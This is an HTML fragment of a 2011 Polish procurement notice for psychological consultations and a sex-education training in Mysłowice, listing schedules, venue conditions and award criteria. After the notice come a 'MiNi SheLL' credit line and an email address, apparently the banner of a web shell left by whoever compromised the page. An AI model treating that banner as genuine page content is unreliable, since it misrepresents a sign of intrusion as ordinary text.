<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualne konsultacje w zakresie problemów psychologicznych.
Czas trwanie: 40h (ok. 2h na uczestnika - w zależności od potrzeb i zdiagnozowanych problemów), w godzinach popołudniowych (16.00-19.00). 
Termin: 16.05- 03.06.11r.
Warunki realizacji: konsultacje powinny odbywać się na terenie Mysłowic (w pobliżu centrum).  Pod uwagę brane będą następujące czynniki: cena  oraz lokalizacja- warunki lokalowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. lokalizacja - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Trening  rozwiązywania problemów wchodzenia w dorosłe życie  oraz indywidualne konsultacje z edukatorem seksualnym w tym obszarze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trening  rozwiązywania problemów wchodzenia w dorosłe życie  oraz indywidualne konsultacje z edukatorem seksualnym w tym obszarze (1h na uczestnika) -rodzina i jej funkcje ,rozwój psychoseksualny, higiena okresu dojrzewania,  odpowiedzialne zachowania w sferze płciowości, choroby przenoszone drogą płciową- AIDS), pornografia i uzależnienia (Internet, środki psychoaktywne) , odpowiedzialność za siebie i innych, metody zapobiegania ciąży 
Czas trwania:16h szkolenia (4dni po 4h) w 2 grupach szkoleniowych po 10 osób (1 spotkanie   tygodniowo w godzinach popołudniowych tj. 16.00- 19.00) oraz 20h indywidualnych konsultacji (1h na uczestnika) z edukatorem seksualnym 
Termin:(06.06-30.06.11r). 
Warunki realizacji: szkolenia powinny odbywać się na terenie Mysłowic (w pobliżu centrum). Podczas szkolenia (prócz indywidualnych konsultacji) konieczne będzie  zapewnienie cateringu dla uczestników.  Pod uwagę brane będą następujące czynniki:  cena, program szkolenia oraz lokalizacja- warunki lokalowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. program szkolenia - 30</li>
<li>3. lokalizacja miejsca szkolenia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com